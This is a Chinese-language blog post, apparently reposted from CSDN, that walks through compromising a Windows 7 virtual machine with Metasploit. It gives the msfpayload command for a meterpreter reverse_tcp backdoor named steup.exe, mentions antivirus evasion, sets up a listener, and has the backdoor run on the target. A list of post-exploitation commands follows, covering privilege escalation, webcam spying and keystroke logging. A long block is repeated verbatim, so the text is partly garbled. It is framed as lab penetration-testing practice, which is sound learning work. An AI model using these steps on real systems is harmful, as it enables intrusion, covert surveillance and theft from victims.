Windows7过程总结与后续手段

使用metaploit进行渗透测试Windows7:

设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.149。

   方法步骤一:用Msfpayload直接生成相关的后门程序,如下图。
   sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x >steup.exe

   方法步骤二:直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。
   进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀
   方法步骤三:接着打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。
   打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :
   方法步骤四:需要能将程序直接拷贝都目标主机中并进行执行。

方法步骤五:以上步骤全部完成后就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。

Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。
另外,附meterpreter常用命令:
getsystem       #会自动利用各种各样的系统漏洞来进行权限提升
migrate          #进程id进程迁移
background     #把当前的会话设置为背景,需要的时候在启用
getuid           #查看对方正在运行的用户
ps              #列出所有的进程
getpid          #返回运行meterpreter的id号
sysinfo         #产看系统信息和体系结构
shell           #切换到cmd的系统权限方式
exit           #退出shell会话返回meterpreter或终止meterpreter
getdesktop    截取目标主机当前桌面会话窗口
run webcam -p /var/www    #在/var/www目录监控目标主机的摄像头
keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘
   sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x >steup.exe

   方法步骤二:直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。
   进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀
   方法步骤三:接着打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。
   打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :
   方法步骤四:需要能将程序直接拷贝都目标主机中并进行执行。

方法步骤五:以上步骤全部完成后就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。

Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。
另外,附meterpreter常用命令:
getsystem       #会自动利用各种各样的系统漏洞来进行权限提升
migrate          #进程id进程迁移
background     #把当前的会话设置为背景,需要的时候在启用
getuid           #查看对方正在运行的用户
ps              #列出所有的进程
getpid          #返回运行meterpreter的id号
sysinfo         #产看系统信息和体系结构
shell           #切换到cmd的系统权限方式
exit           #退出shell会话返回meterpreter或终止meterpreter
getdesktop    截取目标主机当前桌面会话窗口
run webcam -p /var/www    #在/var/www目录监控目标主机的摄像头
keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

猜你喜欢

转载自blog.csdn.net/k17010/article/details/79895229